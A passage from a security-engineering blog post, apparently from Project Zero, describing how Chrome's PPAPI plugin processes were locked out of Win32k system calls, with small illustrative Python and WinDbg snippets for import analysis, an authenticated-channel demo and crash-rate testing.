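    data = b"".join(struct.pack("<IIIII", 0, 0, 0, r, 0) for r in name_rvas)
    data += b"\0" * 20 + blob
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)    # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 112 + 16 * 8, 0x22)
    opt = struct.pack("<H", 0x20B) + b"\0" * 110          # PE32+ magic
    dirs = [b"\0" * 8] * 16
    dirs[1] = struct.pack("<II", va, len(data))
    sec = (b".idata\0\0"
           + struct.pack("<IIII", len(data), va, len(data), raw_ptr)
           + b"\0" * 16)
    hdr = dos + b"PE\0\0" + coff + opt + b"".join(dirs) + sec
    return hdr + b"\0" * (raw_ptr - len(hdr)) + data

demo = build_demo_pe([b"USER32.dll", b"kernel32.dll", b"GDI32.dll"])
flagged = [n.decode() for n in imported_dlls(demo) if n.lower() in WINDOWING_DLLS]
print(flagged)  # ['USER32.dll', 'GDI32.dll']
```

Note that, as the post says, static imports are only half the picture: anything resolved at runtime with LoadLibrary/GetProcAddress needs the dynamic-analysis pass too.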
I attached WinDbg to the process and set breakpoints on all the functions starting with NtUser and NtGdi which I could find. These are the system call stubs used to call Win32k from the various DLLs. This allowed me to catch functions which were in the PPAPI layer or not directly imported.

The Win32k-calling code in Flash and PDFium was almost entirely there to enumerate font information, either directly or via the PPAPI. There was some OpenSSL code in Flash which uses the desktop window as a source of entropy, but as this could never work in the Chrome sandbox it's clear that this was vestigial (or Flash's SSL random number generator is broken; choose one or the other).

Getting rid of the font enumeration code used through PPAPI was easy. Chrome already supported replacing GDI-based font rendering and enumeration with DirectWrite, which does all the rendering in user mode. Most of the actual rendering in Flash and PDFium is done using their own TrueType font implementations (such as FreeType). Enabling DirectWrite for PPAPI processes was implemented in a number of stages, with the final enabling of DirectWrite in this commit.

Now I just needed to get rid of the GDI font code in Flash and PDFium themselves. For PDFium I was able to repurpose existing font code used for Linux and macOS. After much testing to ensure the font rendering didn't regress from GDI, I was able to land the patch in PDFium. Now the only problem was Flash.

As a prototype I implemented shims for all the font APIs used by Flash and emulated them using DirectWrite. For a better, more robust solution I needed to get changes made to Flash itself. I don't have access to the Flash source code; however, Google does have a good working relationship with Adobe, and I used this to get the necessary changes implemented. It turned out that there was already a Pepper API which did all that was needed to replace the GDI font handling: pp::flash::FontFile.
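As an aside on the dynamic-analysis step above: in WinDbg the NtUser/NtGdi breakpoint sweep boils down to a pair of pattern breakpoints. A hedged sketch (the module holding the stubs varies: on current Windows 10 builds they live in win32u.dll rather than USER32/GDI32, so the module names may need adjusting):

```
bm user32!NtUser* "k 3; gc"   $$ log a short stack, then continue
bm gdi32!NtGdi* "k 3; gc"
g
```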
Unfortunately, that API was only implemented on Linux. However, I was able to put together a proof-of-concept Windows implementation of pp::flash::FontFile, and through Xing Zhang of Adobe we got a full implementation into Chrome and Flash.

Doomed Rights Management

From this point I could enable Win32k lockdown for plugins, and after much testing everything seemed to be working, until I tried to play some DRM-protected video. While encrypted video worked, any Flash video which required output protection, such as High-bandwidth Digital Content Protection (HDCP), would not. HDCP works by encrypting the video data between the graphics output and the display, and is designed to prevent people capturing digital video. This presented a real problem, as video, along with games, accounts for some of the only residual uses of Flash. In testing, it also affected the Widevine plugin that implements the Encrypted Media Extensions for Chrome. Widevine uses PPAPI under the hood; not fixing this issue would break all HD content playback.

Enabling HDCP on Windows requires the use of a small number of Win32k APIs. I hadn't discovered this during my initial analysis because a) I didn't run any protected content through the Flash player, and b) the functions were imported at runtime using LoadLibrary and GetProcAddress, only when needed. The function Flash was accessing was OPMGetVideoOutputsFromHMONITOR, which is exposed by dxva2.dll and in turn maps down to multiple Win32k calls such as NtGdiCreateOPMProtectedOutputs.

The ideal fix would have been to implement a new API in Chrome which exposed enabling HDCP, then get Adobe and Widevine to use it. It turns out that the Adobe DRM and Widevine teams are under greater constraints than normal development teams. After discussion with my original contact at Adobe, it emerged that they didn't have access to the DRM code for Flash.
I was able to have meetings with Widevine (they're part of Google) and the Adobe DRM team, but in the end I decided to go it alone and implement redirection of these APIs as part of the sandbox code. Fortunately this doesn't compromise the security guarantees of the original API, because of the way Microsoft designed it.

To prevent a MitM attack against the API calls (i.e. hooking the API and returning the answer the caller expects, such as "HDCP is enabled"), the channel between the caller and the graphics driver is secured using an X.509 certificate chain returned during initialization. Once an application such as Flash verifies that this certificate chain is valid, it sends back a session key to the graphics driver, encrypted with the end certificate's public key. The driver decrypts the session key, and all communication from then on is encrypted and hashed using variants of this key.

Of course this means the driver must contain the private key corresponding to the public key in the end certificate, though at least in the case of my workstation that shouldn't be a major issue, as the end certificate has a special Key Usage OID (1.3.6.1.4.1.311.10.5.8) and the root "Microsoft Digital Media Authority" certificate isn't in the trusted certificate store, so the chain wouldn't be trusted anyway. Users of the API can instead embed the root certificate directly in their code and verify its trust before continuing.

As the APIs already assume the call has been brokered (at minimum via win32k.sys), adding another broker, in this case one which brokers from the PPAPI process to another Chrome process without the Win32k lockdown policy in place, doesn't affect the security guarantees of the API. Of course I made best efforts to validate the data being brokered to limit the potential attack surface, though I'll admit something about sending binary blobs to a graphics driver gives me the chills.
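To make the MitM argument concrete, here is a toy sketch of the pattern, my own illustration rather than the real OPM protocol (which uses X.509 chains, public-key wrapping of the session key, encryption and sequence numbers, none of which appear here): once the session key is established out of reach of the broker, the broker can relay status messages but cannot forge them.

```python
import hashlib
import hmac
import secrets

class ToyDriver:
    """Stand-in for the graphics-driver end of an OPM-like channel."""
    def __init__(self):
        self._key = None

    def set_session_key(self, key: bytes):
        # Real OPM: the key arrives encrypted to the driver certificate's
        # public key, so a man-in-the-middle can't read it. Toy: taken as-is.
        self._key = key

    def get_status(self, request: bytes):
        reply = request + b" -> HDCP=ON"
        return reply, hmac.new(self._key, reply, hashlib.sha256).digest()

# Application (e.g. Flash) side: establish the key, then verify every reply.
key = secrets.token_bytes(32)
driver = ToyDriver()
driver.set_session_key(key)

reply, tag = driver.get_status(b"protection-level?")
genuine = hmac.compare_digest(tag, hmac.new(key, reply, hashlib.sha256).digest())

# A broker that tampers with the reply can't recompute the tag without the key.
forged_ok = hmac.compare_digest(
    tag, hmac.new(key, reply + b" (honest!)", hashlib.sha256).digest())
print(genuine, forged_ok)  # True False
```

This is exactly why interposing an extra broker process, as described above, leaves the API's guarantees intact: the broker only shuttles opaque, keyed messages back and forth.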
This solved the issue of enabling output protection for DRM'ed content, and finally the mitigation could be enabled by default. The commit for this code can be found here.

Avoiding #yolosec

Implementation-wise it turned out to be not too complex once I'd found all the different places Win32k functions could be called. Much of the groundwork was already in place: the original Win32k Renderer lockdown, the implementation of DirectWrite and the way the Pepper APIs were structured.

So ship it already! Well, not so fast; this is where reality kicks in. Chrome on Windows is relied upon by millions upon millions of users worldwide, and Win32k lockdown for PPAPI would affect not only Flash but also PDFium (which is used in things like the Print Preview window) and Widevine. It's imperative that code like this is tested in the real world, but in such a way that the impact on stability and functionality can be measured.

Chrome supports a mechanism called Variations which allows developers to selectively enable experimental features remotely, deploying them to a randomly selected group of users who've opted into returning usage and crash statistics to Google. For example, you can do a simple A/B test with one group of Chrome users left as a control and another with Win32k lockdown enabled. Statistical analysis can then be performed on the results based on various metrics, such as the number of crashes, hanging processes and startup performance, to detect anomalous behaviour due to the experimental code. To avoid impacting users of Stable, this is typically only done on Beta, Dev and Canary users. Having these early-release versions of Chrome is really important for ensuring features work as expected, and we appreciate anyone who takes the time to run them.

In the end this testing process took longer than the implementation. Issues were discovered and fixed, and stability measured, until finally we were ready to ship.
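As an illustration of the kind of analysis such an A/B experiment enables, a textbook two-proportion z-test on crash counts is enough to tell whether the experiment arm is meaningfully less stable than the control. This is my own sketch with invented numbers; Chrome's real Variations pipeline looks at many more metrics and is far more sophisticated.

```python
from math import erf, sqrt

def crash_rate_test(crashes_ctl, users_ctl, crashes_exp, users_exp):
    """Two-proportion z-test: does the experiment's crash rate differ?"""
    p_ctl, p_exp = crashes_ctl / users_ctl, crashes_exp / users_exp
    pooled = (crashes_ctl + crashes_exp) / (users_ctl + users_exp)
    se = sqrt(pooled * (1 - pooled) * (1 / users_ctl + 1 / users_exp))
    z = (p_exp - p_ctl) / se
    p_value = 1 - erf(abs(z) / sqrt(2))   # two-sided
    return z, p_value

# Invented numbers: control vs. Win32k-lockdown-enabled PPAPI processes.
z, p = crash_rate_test(120, 100_000, 155, 100_000)
print(f"z = {z:.2f}, p = {p:.3f}")  # p < 0.05 here: investigate before shipping
```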
Unfortunately, in that process a noticeable stability issue surfaced on Windows 8.1 and below which we couldn't track down. The stability issues are likely down to interactions with third-party code (such as anti-virus products) which injects its own code into Chrome processes; if that injected code relies on calling Win32k APIs for anything, there's a high chance of a crash. This led to the hard decision to initially only enable the PPAPI Win32k lockdown on Windows 10 (where, if anything, stability improved). I hope to revisit this decision in the future; as third-party code is updated to support the now-shipping Windows 10 lockdown, stability on Windows 8/8.1 might improve.

As of M54 of Chrome, Win32k lockdown is enabled by default for users on Windows 10 (with an option to disable it remotely in the unlikely event a problem surfaces). As of M56 (set for release around the end of January 2017) it can only be disabled with a command-line switch which disables all Win32k lockdown, including for Renderer processes.

Wrap Up

From the first patch submitted in September 2015 to the final patch in June, it took almost 10 months of effort to come up with a shipping mitigation. The fact that it's had its first public success (and who knows how many non-public ones) shows that it was worth implementing.

In the latest version of Windows 10, the Anniversary Edition, Microsoft have implemented a Win32k filter which makes it easier to reduce the attack surface without completely disabling all the system calls, something which might have sped up development. Microsoft are also making a proactive effort to improve the Win32k code base. The Win32k filter is already used in Edge; however, at the moment only Microsoft can use it, as the executable's signature is checked before the filter is allowed to be enabled. Also, it's not clear that the filter even completely blocked the vulnerability in the recent in-the-wild exploit chain.
Microsoft would only state it would "stop all observed in-the-wild instances of this exploit". Nuking the Win32k system calls from orbit is the only way to be sure an attacker can't find a bug which passes through the filter.

Hopefully this blog post demonstrates the time and effort required to implement what seems, on the face of it, a fairly simple and clear mitigation policy for an application as complex as Chrome. We'll continue to try to use the operating system's sandboxing mechanisms to make all users of Chrome more secure.

Thanks

While I took on a large proportion of the technical work, it's clear this mitigation could not have shipped without the help of others in Chrome and outside. I'd like to especially mention the following:

- Anantanarayanan Iyengar, for landing the original Win32k mitigations for the Renderer processes, on which all of this is based.
- Will Harris, for dealing with variations and crash reporting to ensure everything was stable.
- The Adobe security team and Xing Zhang, for helping to remove the GDI font code from Flash.
- The Widevine team, for advice on DRM issues.

Source: https://googleprojectzero.blogspot.ro/2016/11/breaking-chain.html